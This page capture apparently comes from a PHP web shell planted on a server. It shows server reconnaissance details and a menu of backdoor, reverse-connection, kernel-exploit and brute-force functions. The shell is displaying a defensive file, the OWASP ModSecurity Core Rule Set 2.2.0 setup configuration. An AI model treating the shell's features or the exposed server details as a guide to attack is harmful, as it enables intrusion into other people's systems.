|
IP Address: 80.252.133.24:443 You: 216.73.216.93
| |||||||||||||||||||
|
| ||||||||||||||||||
| MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
| Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
|
| |||||||||||||||||||
/ usr/ share/ modsecurity-crs/ - drwxr-xr-x | |||||||||||||||||||
|
Viewing file:
Select action/file-type: # ---------------------------------------------------------------
# Core ModSecurity Rule Set ver.2.2.0
# Copyright (C) 2006-2011 Trustwave All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------
## -- Configuration ----------------------------------------------------------
#
# Specify CRS version in the audit logs.
#
SecComponentSignature "core ruleset/2.2.0"
#
# Review your SecRuleEngine settings. If you want to
# allow blocking, then set it to On however check your SecDefaultAction setting
# to ensure that it is set appropriately.
#
#SecRuleEngine DetectionOnly
#
# -=[ Mode of Operation ]=-
#
# You can now choose how you want to run the modsecurity rules -
#
# Anomaly Scoring vs. Traditional
#
# Each detection rule uses the "block" action which will inherit the SecDefaultAction
# specified below. Your settings here will determine which mode of operation you use.
#
# Traditional mode is the current default setting and it uses "deny" (you can set any
# disruptive action you wish)
#
# If you want to run the rules in Anomaly Scoring mode (where blocking is delayed until the
# end of the request phase and rules contribute to an anomaly score) then set the
# SecDefaultAction to "pass"
#
# You can also decide how you want to handle logging actions. You have three options -
#
# - To log to both the Apache error_log and ModSecurity audit_log file use - log
# - To log *only* to the ModSecurity audit_log file use - nolog,auditlog
# - To log *only* to the Apache error_log file use - log,noauditlog
#
SecDefaultAction "phase:2,deny,log"
#
# -=[ Anomaly Scoring Block Mode ]=-
#
# This is a collaborative detection mode where each rule will increment an overall
# anomaly score the transaction. The scores are then evaluated in the following files:
#
# Inbound anomaly score - checked in the modsecurity_crs_49_inbound_blocking.conf file
# Outbound anomaly score - checked in the modsecurity_crs_59_outbound_blocking.conf file
#
# If you do not want to use anomaly scoring mode, then comment out this line.
#
#SecAction "phase:1,id:'981206',t:none,nolog,pass,setvar:tx.anomaly_score_blocking=on"
#
# -=[ Anomaly Scoring Severity Levels ]=-
#
# These are the default scoring points for each severity level. You may
# adjust these to you liking. These settings will be used in macro expansion
# in the rules to increment the anomaly scores when rules match.
#
# These are the default Severity ratings (with anomaly scores) of the individual rules -
#
# - 2: Critical - Anomaly Score of 5.
# Is the highest severity level possible without correlation. It is
# normally generated by the web attack rules (40 level files).
# - 3: Error - Anomaly Score of 4.
# Is generated mostly from outbound leakage rules (50 level files).
# - 4: Warning - Anomaly Score of 3.
# Is generated by malicious client rules (35 level files).
# - 5: Notice - Anomaly Score of 2.
# Is generated by the Protocol policy and anomaly files.
#
SecAction "phase:1,id:'981207',t:none,nolog,pass, \
setvar:tx.critical_anomaly_score=5, \
setvar:tx.error_anomaly_score=4, \
setvar:tx.warning_anomaly_score=3, \
setvar:tx.notice_anomaly_score=2"
#
# -=[ Anomaly Scoring Threshold Levels ]=-
#
# These variables are used in macro expansion in the 49 inbound blocking and 59
# outbound blocking files.
#
# **MUST HAVE** ModSecurity v2.5.12 or higher to use macro expansion in numeric
# operators. If you have an earlier version, edit the 49/59 files directly to
# set the appropriate anomaly score levels.
#
# You should set the score to the proper threshold you would prefer. If set to "5"
# it will work similarly to previous Mod CRS rules and will create an event in the error_log
# file if there are any rules that match. If you would like to lessen the number of events
# generated in the error_log file, you should increase the anomaly score threshold to
# something like "20". This would only generate an event in the error_log file if
# there are multiple lower severity rule matches or if any 1 higher severity item matches.
#
SecAction "phase:1,id:'981208',t:none,nolog,pass,setvar:tx.inbound_anomaly_score_level=5"
SecAction "phase:1,id:'981209',t:none,nolog,pass,setvar:tx.outbound_anomaly_score_level=4"
#
# -=[ Paranoid Mode ]=-
#
# There are many different transactional variables that can be inspected for
# attacks. Some variables, such as ARGS, has the best false negative/false
# positive ratio where it will catch the vast majority of attack payloads and
# not have a high false positive rate. This is also true for some security
# checks such as @validateByteRange checks where we are initially only inspecting
# for Nul Bytes.
#
# There are, however, some possibilities for false negative issues with inspecting
# parsed data and this could lead to missed attacks. If you
# want to lessen the chances for false negatives, then you should enable
# "Paranoid Mode" processing by setting the following line to 1. This will process
# additional rules that are inspecting variables with a higher false positive rate.
#
SecAction "phase:1,id:'981210',t:none,nolog,pass,setvar:tx.paranoid_mode=0"
#
# -=[ Regression Testing Mode ]=-
#
# If you are going to run the regression testing mode, you should uncomment the
# following rule. It will enable DetectionOnly mode for the SecRuleEngine and
# will enable Response Header tagging so that the client testing script can see
# which rule IDs have matched.
#
# You must specify the your source IP address where you will be running the tests
# from.
#
# SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" "phase:1,t:none,nolog,pass,ctl:ruleEngine=DetectionOnly,setvar:tx.regression_testing=1"
#
# -=[ HTTP Policy Settings ]=-
#
# Set the following policy settings here and they will be propagated to the 23 rules
# file (modsecurity_common_23_request_limits.conf) by using macro expansion.
# If you run into false positives, you can adjust the settings here.
#
# Only the max number of args is uncommented by default as there are a high rate
# of false positives. Uncomment the items you wish to set.
#
## Maximum number of arguments in request limited
SecAction "phase:1,id:'981211',t:none,nolog,pass,setvar:tx.max_num_args=255"
## Limit argument name length
#SecAction "phase:1,t:none,nolog,pass,setvar:tx.arg_name_length=100"
## Limit value name length
#SecAction "phase:1,t:none,nolog,pass,setvar:tx.arg_length=400"
## Limit arguments total length
#SecAction "phase:1,t:none,nolog,pass,setvar:tx.total_arg_length=64000"
## Individual file size is limited
#SecAction "phase:1,t:none,nolog,pass,setvar:tx.max_file_size=1048576"
## Combined file size is limited
#SecAction "phase:1,t:none,nolog,pass,setvar:tx.combined_file_sizes=1048576"
#
# -=[ HTTP Policy Settings ]=-
#
# Set the following policy settings here and they will be propagated to the 30 rules
# file (modsecurity_crs_30_http_policy.conf) by using macro expansion.
# If you run into false positves, you can adjust the settings here.
#
SecAction "phase:1,id:'981212',t:none,nolog,pass, \
setvar:'tx.allowed_methods=GET HEAD POST OPTIONS', \
setvar:'tx.allowed_request_content_type=application/x-www-form-urlencoded multipart/form-data text/xml application/xml application/x-amf', \
setvar:'tx.allowed_http_versions=HTTP/0.9 HTTP/1.0 HTTP/1.1', \
setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/', \
setvar:'tx.restricted_headers=/Proxy-Connection/ /Lock-Token/ /Content-Range/ /Translate/ /via/ /if/'"
#
# -=[ Content Security Policy (CSP) Settings ]=-
#
# The purpose of these settings is to send CSP response headers to
# Mozilla FireFox users so that you can enforce how dynamic content
# is used. CSP usage helps to prevent XSS attacks against your users.
#
# Reference Link:
#
# https://developer.mozilla.org/en/Security/CSP
#
# Define the following CSP settings for your site:
#
# - Report-Only mode
# https://wiki.mozilla.org/Security/CSP/Specification#Report-Only_mode
#
# - Allow
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#allow
#
# - img-src
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#img-src
#
# - media-src
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#media-src
#
# - script-src
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#script-src
#
# - object-src
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#object-src
#
# - frame-src
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#frame-src
#
# - xhr-src
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#xhr-src
#
# - frame-ancestors
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#frame-ancestors
#
# - style-src
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#style-src
#
# - report-uri
# https://developer.mozilla.org/en/Security/CSP/CSP_policy_directives#report-uri
#
# Uncomment this SecAction line if you want use CSP enforcement.
# You need to set the appropriate directives and settings for your site/domain and
# and activate the CSP file in the experimental_rules directory.
#
#SecAction "phase:1,id:'981213',t:none,nolog,pass, \
#setvar:tx.csp_report_only=1, \
#setvar:tx.csp_report_uri=/csp_violation_report, \
#setenv:'csp_policy=allow \'self\'; img-src *.yoursite.com; media-src *.yoursite.com; style-src *.yoursite.com; frame-ancestors *.yoursite.com; script-src *.yoursite.com; report-uri %{tx.csp_report_uri}'"
#
# -=[ Brute Force Protection ]=-
#
# If you are using the Brute Force Protection rule set, then uncomment the following
# lines and set the following variables:
# - Protected URLs: resources to protect (e.g. login pages) - set to your login page
# - Burst Time Slice Interval: time interval window to monitor for bursts
# - Request Threshold: request # threshold to trigger a burst
# - Block Period: temporary block timeout
#
#SecAction "phase:1,id:'981214',t:none,nolog,pass, \
#setvar:'tx.brute_force_protected_urls=/login.jsp /partner_login.php', \
#setvar:'tx.brute_force_burst_time_slice=60', \
#setvar:'tx.brute_force_counter_threshold=10', \
#setvar:'tx.brute_force_block_timeout=300'"
#
# -=[ DoS Protection ]=-
#
# If you are using the DoS Protection rule set, then uncomment the following
# lines and set the following variables:
# - Burst Time Slice Interval: time interval window to monitor for bursts
# - Request Threshold: request # threshold to trigger a burst
# - Block Period: temporary block timeout
#
#SecAction "phase:1,id:'981215',t:none,nolog,pass, \
#setvar:'tx.dos_burst_time_slice=60', \
#setvar:'tx.dos_counter_threshold=100', \
#setvar:'tx.dos_block_timeout=600'"
#
# -=[ Check UTF enconding ]=-
#
# We only want to apply this check if UTF-8 encoding is actually used by the site, otherwise
# it will result in false positives.
#
# Uncomment this line if your site uses UTF8 encoding
#SecAction "phase:1,id:'981216',t:none,nolog,pass,setvar:tx.crs_validate_utf8_encoding=1"
#
# -=[ Enable XML Body Parsing ]=-
#
# The rules in this file will trigger the XML parser upon an XML request
#
# Initiate XML Processor in case of xml content-type
#
SecRule REQUEST_HEADERS:Content-Type "text/xml" \
"chain,phase:1,id:'981053',t:none,t:lowercase,pass,nolog"
SecRule REQBODY_PROCESSOR "!@streq XML" "ctl:requestBodyProcessor=XML"
#
# -=[ Global and IP Collections ]=-
#
# Create both Global and IP collections for rules to use
# There are some CRS rules that assume that these two collections
# have already been initiated.
#
SecRule REQUEST_HEADERS:User-Agent "^(.*)$" "phase:1,id:'981217',t:none,pass,nolog,t:sha1,t:hexEncode,setvar:tx.ua_hash=%{matched_var}"
SecRule REQUEST_HEADERS:x-forwarded-for "^\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\b" "phase:1,id:'981225',t:none,pass,nolog,capture,setvar:tx.real_ip=%{tx.1}"
SecRule &TX:REAL_IP "!@eq 0" "phase:1,id:'981226',t:none,pass,nolog,initcol:global=global,initcol:ip=%{tx.real_ip}_%{tx.ua_hash}"
SecRule &TX:REAL_IP "@eq 0" "phase:1,id:'981218',t:none,pass,nolog,initcol:global=global,initcol:ip=%{remote_addr}_%{tx.ua_hash}"
|